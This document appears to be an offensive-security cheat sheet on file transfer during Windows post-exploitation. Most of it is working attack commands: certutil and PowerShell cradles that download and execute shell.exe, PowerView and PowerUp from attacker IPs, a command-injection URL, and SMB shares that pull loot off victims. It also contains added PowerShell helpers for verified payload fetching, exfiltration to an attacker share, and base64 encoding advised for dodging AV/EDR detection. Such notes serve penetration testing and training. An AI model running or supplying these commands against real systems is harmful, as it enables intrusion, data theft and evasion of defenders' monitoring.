File Transfer

ZIP Files

HFS (HTTP File Server), a GUI-based tool for serving files over HTTP from Windows

Command-line based

certutil -urlcache -split -f http://10.10.14.3/shell.exe C:\users\public\shell.exe
certutil -urlcache -split -f http://10.10.14.3/shell.exe C:\shell.exe & shell.exe

curl http://<URL>/file.exe --output file.exe

#evil-winrm (upload is a built-in command of the evil-winrm shell)
upload /home/kali/Tools/Windows/nc.exe

#Powershell remoting ($appsrv1 is a session object from New-PSSession)
Copy-Item -ToSession $appsrv1 -Path file_to_copy.exe -Destination C:\Users\appadmin\Downloads

Via SMB

  • Attacker --> Victim

#Attacker's System
#Shares current directory (recent Windows builds refuse unauthenticated guest SMB access by default,
#so prefer -smb2support with -username/-password as in the third form below)
sudo impacket-smbserver shared . 
sudo smbserver.py -smb2support Data $(pwd)

sudo python3 /opt/impacket/examples/smbserver.py share . -smb2support -username user -password s3cureP@ssword
net use \\ATTACKER_IP\share /USER:user s3cureP@ssword 

#Disconnect
net use \\ATTACKER_IP\share /del

#Victim's System
copy \\10.10.14.15\shared\exploit.exe c:\users\public\file.exe

#Metasploit's smb_delivery

systemctl start smbd
#/etc/samba/smb.conf
[blue]
    comment = hello
    path = /home/kali/shareddir
    guest ok = yes
    browsable = yes
    read only = no
    
#Powershell (copy through the C$ admin share)
Copy-Item .\Invoke-MimikatzEx.ps1 "\\dcorpadminsrv.dollarcorp.moneycorp.local\c$\Program Files"

  • Victim --> Attacker

#1#Attacker
impacket-smbserver pub `pwd`
sudo smbserver.py -smb2support Data $(pwd) -user kali -password mypass

#Victim: Powershell
net use z: \\192.168.119.174\pub /user:kali mypass
net use z: \\192.168.119.174\pub
cp "File name.txt" z:

net use z: /delete

#2#Attacker
sudo impacket-smbserver shared $(pwd) -smb2support -username kali -password mypass

#Victim
$pass= convertto-securestring 'mypass' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kali',$pass)
New-PSDrive -Name "shared" -PSProvider "Filesystem" -Root "\\192.168.42.42\shared" -Credential $cred 
net use z: \\192.168.42.42\shared

#List shares this host offers (not the shares it has mapped)
Powershell: Get-SmbShare
Without Powershell: net share
#To list shares this host has mapped, run net use with no arguments
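The Victim --> Attacker copies above (both the net use and the New-PSDrive form) work, but a dropped SMB session silently leaves a truncated file on the share and an unmapped drive behind on the host. The following is an added example, not code from the original page: it maps the share with credentials, copies a file, compares SHA256 hashes on both sides, and always removes the mapping. The share path, credentials and file path are assumed values.

```powershell
# Added example (not from the original page): copy a file from the victim to an
# attacker-hosted SMB share with credentials, verify the copy by hash, and always unmap.
# Assumed values: share \\192.168.42.42\shared, user 'kali', password 'mypass',
# source file C:\Users\Public\loot.txt (the attacker runs impacket-smbserver with
# -smb2support -username kali -password mypass as shown above).
param(
    [string]$Share = '\\192.168.42.42\shared',
    [string]$User  = 'kali',
    [string]$Pass  = 'mypass',
    [string]$File  = 'C:\Users\Public\loot.txt',
    [string]$Drive = 'shared'
)

$secure = ConvertTo-SecureString $Pass -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential($User, $secure)

try {
    # PSDrive mapping needs no free drive letter, unlike net use z:
    New-PSDrive -Name $Drive -PSProvider FileSystem -Root $Share -Credential $cred | Out-Null

    $src = Get-Item -LiteralPath $File
    $dst = Join-Path "${Drive}:" $src.Name
    Copy-Item -LiteralPath $src.FullName -Destination $dst -Force

    # Hash both ends: a partial transfer over a flaky SMB session is otherwise invisible.
    $srcHash = (Get-FileHash -LiteralPath $src.FullName -Algorithm SHA256).Hash
    $dstHash = (Get-FileHash -LiteralPath $dst -Algorithm SHA256).Hash
    if ($srcHash -ne $dstHash) {
        throw "Hash mismatch for $($src.Name): local $srcHash, remote $dstHash"
    }
    Write-Host "Copied $($src.Name) ($($src.Length) bytes), SHA256 $srcHash"
}
finally {
    # Drop the mapping even on failure; leftover mappings show up in 'net use' output.
    if (Get-PSDrive -Name $Drive -ErrorAction SilentlyContinue) {
        Remove-PSDrive -Name $Drive -Force
    }
}
```

Get-FileHash accepts the provider path (shared:\loot.txt) because the PSDrive is backed by the FileSystem provider, so the remote hash is computed by reading the file back over SMB rather than trusting the copy.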

Troubleshooting Common Errors

Via Web Server

url.com/exploit.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.40/PowerUp.ps1"); | powershell -noprofile -

powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.2:8000/PowerView.ps1'); 
#DownloadFile needs the full target file path, not just a directory
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<Source-IP>/<File>', '<Destination file path>')"

(new-object net.webclient).downloadfile('http://<Source-IP>/<File>', '<Destination file path>')

Invoke-WebRequest -Uri "http://<Source-IP/File>" -OutFile "PowerView.ps1"

#Execute in memory
IEX(iwr http://<IP>/PowerView.ps1 -UseBasicParsing) 
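The cradles above fetch and run whatever the web server returns; nothing checks that the bytes are the ones you staged. The following is an added example, not code from the original page: one helper that wraps the Invoke-WebRequest and WebClient cradles, verifies an expected SHA256 before anything is written to disk or handed to IEX, and falls back from Invoke-WebRequest to WebClient on hosts where the former is unavailable. The URLs, hash and output paths in the usage lines are assumed values.

```powershell
# Added example (not from the original page): download with an integrity check.
# Assumptions: the attacker web server is plain HTTP on 10.10.14.2:8000 / 10.10.14.3
# as in the cradles above; the expected hash is whatever you computed when staging the file.
function Get-RemoteFile {
    param(
        [Parameter(Mandatory)][string]$Url,
        [string]$OutFile,                 # omit to keep the content in memory only
        [string]$Sha256,                  # expected hash (hex); omit to skip the check
        [string]$UserAgent = 'Mozilla/5.0'
    )
    # Force TLS 1.2 so an HTTPS listener with modern defaults is not rejected by old .NET.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    try {
        # -UseBasicParsing avoids the IE engine dependency; RawContentStream gives the raw bytes
        # regardless of whether the response was text or binary.
        $resp  = Invoke-WebRequest -Uri $Url -UseBasicParsing -UserAgent $UserAgent
        $bytes = $resp.RawContentStream.ToArray()
    }
    catch {
        # Fallback cradle for hosts without Invoke-WebRequest (PowerShell 2.0) or where it is blocked.
        $wc = New-Object Net.WebClient
        $wc.Headers.Add('User-Agent', $UserAgent)
        $bytes = $wc.DownloadData($Url)
    }

    if ($Sha256) {
        $sha    = [Security.Cryptography.SHA256]::Create()
        $actual = [BitConverter]::ToString($sha.ComputeHash($bytes)).Replace('-', '')
        if ($actual -ne $Sha256.ToUpper()) {
            throw "SHA256 mismatch for ${Url}: got $actual, expected $Sha256"
        }
    }

    if ($OutFile) {
        [IO.File]::WriteAllBytes($OutFile, $bytes)
        return Get-Item -LiteralPath $OutFile
    }
    # Nothing touched disk: hand back the script text for the caller to IEX.
    return [Text.Encoding]::UTF8.GetString($bytes)
}

# Fetch a script to memory only, verify it, then execute (hash is an assumed placeholder):
# IEX (Get-RemoteFile -Url 'http://10.10.14.2:8000/PowerView.ps1' -Sha256 '<expected hex>')
# Drop a binary to disk, verified:
# Get-RemoteFile -Url 'http://10.10.14.3/shell.exe' -OutFile C:\Users\Public\shell.exe -Sha256 '<expected hex>'
```

Compute the expected hash on the attacker side when staging the file (sha256sum on Linux, Get-FileHash on Windows) and paste it into the call; if the listener is ever swapped or the transfer is tampered with in transit, the helper throws before anything is executed.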

Exfil using Base64

Downloading Files Onto Compromised Host

S3 Bucket

  • Encode the file using certutil: certutil.exe -encode file.exe file.txt (the output is base64 wrapped in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines, which -decode strips again).

  • Host the text file on an S3 bucket.

  • Fetch the file from the S3 bucket on the target host and save the content to a .txt file.

  • Decode the file: certutil.exe -decode file.txt file.exe

    • certutil.exe with -encode/-decode/-urlcache is widely signatured by AV/EDR and command-line logging; the same base64 transform can be done from PowerShell with the .NET Convert class, so prefer that where cmd.exe activity is monitored.
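The steps above, carried out in PowerShell instead of certutil, as an added example that is not part of the original page. The encoder writes wrapped base64 preceded by a SHA256 line; the decoder accepts that format as well as certutil -encode output (it skips the PEM-style header and footer), and refuses to write the binary if the decoded bytes do not match the recorded hash, which catches a truncated copy/paste or a partially fetched object. Paths in the usage lines are assumptions.

```powershell
# Added example (not from the original page): PowerShell replacement for the
# certutil -encode / -decode steps, with an integrity check on decode.
# Assumed paths: C:\Users\Public\file.exe (binary) and C:\Users\Public\file.txt (text).

function ConvertTo-Base64File {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$OutFile,
        [int]$LineLength = 76
    )
    $bytes = [IO.File]::ReadAllBytes($Path)
    $hash  = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    $b64   = [Convert]::ToBase64String($bytes)
    # Wrap lines so the text survives copy/paste through a browser, S3 console or terminal.
    $lines = for ($i = 0; $i -lt $b64.Length; $i += $LineLength) {
        $b64.Substring($i, [Math]::Min($LineLength, $b64.Length - $i))
    }
    # First line records the hash; the decoder verifies against it before writing anything.
    Set-Content -LiteralPath $OutFile -Value (@("SHA256:$hash") + $lines) -Encoding ASCII
    return $hash
}

function ConvertFrom-Base64File {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$OutFile
    )
    $expected = $null
    $body = foreach ($line in Get-Content -LiteralPath $Path) {
        $t = $line.Trim()
        if ($t -like 'SHA256:*') { $expected = $t.Substring(7); continue }
        # Skip certutil -encode's -----BEGIN/END CERTIFICATE----- lines so its output decodes too.
        if ($t -like '-----*') { continue }
        if ($t) { $t }
    }
    # FromBase64String ignores whitespace, so joining the wrapped lines directly is safe.
    $bytes  = [Convert]::FromBase64String(($body -join ''))
    $sha    = [Security.Cryptography.SHA256]::Create()
    $actual = [BitConverter]::ToString($sha.ComputeHash($bytes)).Replace('-', '')
    if ($expected -and $actual -ne $expected) {
        throw "Decoded payload hash $actual does not match $expected; the text was truncated or altered"
    }
    [IO.File]::WriteAllBytes($OutFile, $bytes)
    return $actual
}

# On the source host, then on the target after moving file.txt across (via S3, paste, etc.):
# ConvertTo-Base64File   -Path C:\Users\Public\file.exe -OutFile C:\Users\Public\file.txt
# ConvertFrom-Base64File -Path C:\Users\Public\file.txt -OutFile C:\Users\Public\file.exe
```

A file encoded with certutil -encode on one side can still be decoded with ConvertFrom-Base64File on the other; it simply has no hash line, so the integrity check is skipped in that case.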

RDP

If we have credentials for a Windows machine and the user is a member of "Remote Desktop Users", we can share a local directory as a mounted drive through RDP itself when we connect; on the target it appears under \\tsclient\<share name>:

rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries 192.168.30.30 -u pelota -p -
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.138.3 /workarea /drive:/localdir,share /dynamic-resolution +clipboard
